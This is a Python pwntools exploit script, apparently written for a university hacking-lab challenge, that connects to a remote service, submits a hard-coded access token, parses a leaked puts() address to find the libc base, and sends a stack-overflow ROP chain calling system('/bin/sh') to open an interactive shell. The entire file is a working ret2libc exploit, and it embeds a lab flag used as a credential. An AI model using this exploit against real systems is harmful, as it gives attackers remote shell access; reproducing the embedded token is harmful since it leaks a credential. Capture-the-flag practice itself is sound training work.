
# 0x0000000000401293 : pop rdi ; ret
import re

from pwn import *
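HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4008

# ROP gadgets taken from the level8 binary at fixed addresses (so the binary
# is presumably non-PIE -- confirm with checksec).  0x401294 is the bare
# `ret` inside the `pop rdi; ret` gadget at 0x401293 (see the comment at the
# top of the file); it is only used as a stack-alignment pad.
POP_RDI_RET = 0x0000000000401293
RET = 0x0000000000401294
# Distance from the start of the overflowed buffer to the saved return address.
PADDING = 40
# Answer to the service's opening prompt.  Presumably the previous level's
# flag acting as an access check -- confirm against the banner.  It is a
# credential; keep this file out of shared repositories.
ACCESS_TOKEN = "hacklab{0nly_n33d_0n3_7iny_1nfole4k_Bv4KxlTP}"
# The symbol offsets are only meaningful if this is the same libc build the
# remote service runs.  A mismatch normally yields a base that is not
# page-aligned, which libc_base_from_leak() rejects before anything is sent.
LIBC_PATH = '/lib/x86_64-linux-gnu/libc.so.6'
PROMPT = b"What do you want to talk about?"


def parse_leak(line: bytes) -> int:
    """Return the last 0x-prefixed hex number in *line* as an int.

    Replaces the fixed ``line[-15:-1]`` slice, which silently mis-parses (or
    raises a confusing ValueError) if the banner text or the address width
    ever differs from "0x" + 12 hex digits.

    Raises:
        ValueError: if *line* contains no 0x-prefixed hex token.
    """
    tokens = re.findall(rb"0x[0-9a-fA-F]+", line)
    if not tokens:
        raise ValueError(f"no hex address found in leak line: {line!r}")
    return int(tokens[-1], 16)


def libc_base_from_leak(puts_abs: int, puts_offset: int) -> int:
    """Derive the libc load address from a leaked absolute puts() address.

    Raises:
        ValueError: if the result is not page-aligned.  That almost always
            means the local libc does not match the remote one, or the leak
            was mis-parsed; stopping here beats firing a payload with garbage
            system()/"/bin/sh" addresses and losing the connection.
    """
    base = puts_abs - puts_offset
    if base & 0xfff:
        raise ValueError(f"libc base {base:#x} is not page-aligned; "
                         "local libc probably differs from the remote one")
    return base


def build_rop_chain(libc_base: int, system_offset: int, binsh_offset: int) -> bytes:
    """Build the overflow payload: padding, alignment `ret`, then system("/bin/sh").

    The extra `ret` keeps RSP 16-byte aligned on entry to system(); glibc's
    system() uses SSE instructions that fault on a misaligned stack.
    """
    return b"".join([
        b"A" * PADDING,
        p64(RET),
        p64(POP_RDI_RET),
        p64(libc_base + binsh_offset),   # rdi = address of "/bin/sh" in libc
        p64(libc_base + system_offset),
    ])


def recv_and_print(p, label: str = "[+] question:") -> None:
    """Read one line with a 2 s timeout and echo it (an empty read on timeout prints as empty)."""
    line = p.recvline(timeout=2)
    # errors="replace" so a stray non-UTF-8 byte in the banner cannot abort the run.
    print(label, line.decode(errors="replace").strip())


def main() -> None:
    """Run the exploit end to end: access prompt, libc leak, ROP chain, interactive shell."""
    # Resolve offsets before connecting so a missing/odd local libc does not
    # burn the remote session's timeout window.
    libc = ELF(LIBC_PATH)
    puts_offset = libc.symbols['puts']
    system_offset = libc.symbols['system']
    binsh_offset = next(libc.search(b'/bin/sh'))
    print(hex(puts_offset))
    print(hex(system_offset))
    print(hex(binsh_offset))

    p = remote(HOST, PORT)
    # Two banner lines precede the access prompt; two more follow the answer.
    for _ in range(2):
        recv_and_print(p)
    print(f"sending: {ACCESS_TOKEN}")
    p.sendline(ACCESS_TOKEN.encode())
    for _ in range(2):
        recv_and_print(p)

    leak_line = p.recvline()
    print(leak_line)
    puts_abs = parse_leak(leak_line)
    print(hex(puts_abs))
    libc_base = libc_base_from_leak(puts_abs, puts_offset)
    print("[+] libc base:", hex(libc_base))

    p.recvuntil(PROMPT)
    payload = build_rop_chain(libc_base, system_offset, binsh_offset)
    print("payload: ", payload)
    p.sendline(payload)
    p.interactive()


if __name__ == "__main__":
    main()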